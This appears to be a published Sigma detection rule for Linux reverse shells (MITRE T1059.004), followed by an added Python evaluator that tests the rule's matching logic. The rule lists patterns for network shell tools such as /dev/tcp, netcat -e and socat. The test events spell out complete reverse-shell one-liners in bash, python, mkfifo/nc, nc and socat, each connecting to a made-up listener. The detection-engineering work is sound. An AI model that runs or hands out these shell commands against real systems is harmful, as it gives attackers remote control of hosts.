Zion Boggan
repos/Detection As Code/rules/linux/execution/T1059.004_reverse_shell.yml
zionboggan.com ↗
35 lines · yaml
title: Potential Reverse Shell via Shell Interpreter
id: 389cb62c-20d8-4367-a9e7-a809e0ba71d0
status: experimental
description: >
  Detects common reverse-shell one-liners spawned through a Unix shell: bash/sh redirecting
  stdio to a /dev/tcp or /dev/udp pseudo-device, interpreters opening a socket back to an
  attacker, and netcat/socat handing a shell to a remote listener.
references:
  - https://attack.mitre.org/techniques/T1059/004/
  - https://gtfobins.github.io/
author: Zion Boggan
date: 2026-05-16
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  product: linux
  category: process_creation
detection:
  selection_bash_tcp:
    CommandLine|contains:
      - '/dev/tcp/'
      - '/dev/udp/'
  selection_interpreters:
    CommandLine|contains:
      - 'socket.socket('
      - 'bash -i'
      - 'mkfifo /tmp/'
      - 'socat tcp'
  # A plain 'sh -i' substring also matches 'ssh -i <keyfile>'; anchoring on a word
  # boundary catches a bare or path-qualified sh only ('bash -i' is covered above).
  selection_interactive_sh:
    CommandLine|re: '\bsh -i\b'
  # A plain 'nc -e' substring matches 'rsync -e ssh' and misses the common
  # 'nc <host> <port> -e /bin/sh' ordering; match a netcat binary with -e anywhere after it.
  selection_netcat_exec:
    CommandLine|re: '\b(nc|ncat|netcat)(\.traditional)?\b.*\s-e\s'
  condition: 1 of selection_*
falsepositives:
  - Legitimate use of netcat/socat by admins; baseline expected usage.
  - Scripts that open /dev/tcp/<host>/<port> as a lightweight port or connectivity check.
level: high
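To check what the rule's matching logic actually does on realistic process-creation events, here is an added Python evaluator. It is example code written for this page, not part of the rule or the repository. It transcribes the detection block into a dict and implements only what the rule needs: the Sigma `contains` modifier (case-insensitive, the Sigma default), the `re` modifier (case-sensitive search), and the `1 of selection_*` condition. The `sh -i` and `nc -e` entries are expressed as word-boundary regexes so that `ssh -i <key>` and `rsync -e ssh` do not fire while `nc <host> <port> -e /bin/sh` does. The events are constructed, not captured telemetry, and the `Image` values and the 10.0.0.5 listener address are made up for the example.

```python
"""Added example: evaluate the rule's detection logic over constructed process events."""
import re

# Transcription of the rule's detection block as a Python dict. The two regex
# selections are an adjustment over plain 'sh -i' / 'nc -e' substrings (those also hit
# 'ssh -i <key>' and 'rsync -e ssh', and miss 'nc <host> <port> -e /bin/sh').
DETECTION = {
    "selection_bash_tcp": {
        "CommandLine|contains": ["/dev/tcp/", "/dev/udp/"],
    },
    "selection_interpreters": {
        "CommandLine|contains": ["socket.socket(", "bash -i", "mkfifo /tmp/", "socat tcp"],
    },
    "selection_interactive_sh": {
        "CommandLine|re": r"\bsh -i\b",
    },
    "selection_netcat_exec": {
        "CommandLine|re": r"\b(nc|ncat|netcat)(\.traditional)?\b.*\s-e\s",
    },
    "condition": "1 of selection_*",
}


def _field_matches(value, modifier, patterns):
    """Sigma semantics for the two modifiers this rule uses: a list of patterns is OR-ed,
    'contains' is case-insensitive (the Sigma default), 're' is a case-sensitive search."""
    if isinstance(patterns, str):
        patterns = [patterns]
    if modifier == "contains":
        lowered = value.lower()
        return any(p.lower() in lowered for p in patterns)
    if modifier == "re":
        return any(re.search(p, value) for p in patterns)
    raise ValueError(f"modifier not implemented here: {modifier}")


def _selection_matches(selection, event):
    """Every field inside one selection must match (AND); a missing field never matches."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None or not _field_matches(value, modifier, patterns):
            return False
    return True


def matching_selections(detection, event):
    """Names of the selections that match the event, in rule order."""
    return [name for name, sel in detection.items()
            if name != "condition" and _selection_matches(sel, event)]


def is_alert(detection, event):
    """Only the '1 of selection_*' condition form used by this rule is implemented."""
    if detection["condition"] != "1 of selection_*":
        raise ValueError("condition form not implemented here")
    return any(n.startswith("selection_") for n in matching_selections(detection, event))


# Constructed process_creation events (not real telemetry): four reverse shells,
# one socat shell, and two benign admin commands that naive substrings would flag.
SAMPLE_EVENTS = [
    {"Image": "/bin/bash", "CommandLine": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"},
    {"Image": "/usr/bin/python3",
     "CommandLine": "python3 -c 'import socket,pty;s=socket.socket();"
                    "s.connect((\"10.0.0.5\",4444));pty.spawn(\"/bin/sh\")'"},
    {"Image": "/bin/sh",
     "CommandLine": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f"},
    {"Image": "/usr/bin/nc", "CommandLine": "nc 10.0.0.5 4444 -e /bin/sh"},
    {"Image": "/usr/bin/socat", "CommandLine": "socat TCP:10.0.0.5:4444 EXEC:/bin/sh,pty,stderr"},
    {"Image": "/usr/bin/ssh", "CommandLine": "ssh -i /home/ops/.ssh/id_ed25519 ops@bastion"},
    {"Image": "/usr/bin/rsync", "CommandLine": "rsync -av -e ssh /srv/www/ backup:/srv/www/"},
]


def run(events=SAMPLE_EVENTS):
    """Return (CommandLine, matching selection names, alert?) for each event."""
    return [(e["CommandLine"], matching_selections(DETECTION, e), is_alert(DETECTION, e))
            for e in events]


if __name__ == "__main__":
    for cmd, hits, alert in run():
        print(f"{'ALERT' if alert else 'ok   '} {hits or '-'}  {cmd}")
```

Run it as a script to see which selection fires for each line. The two benign commands (`ssh -i`, `rsync -e`) stay quiet only because of the word-boundary regexes; swap them for the plain substrings and both light up, which is the kind of check worth repeating against a day of real process telemetry before promoting the rule out of `experimental`.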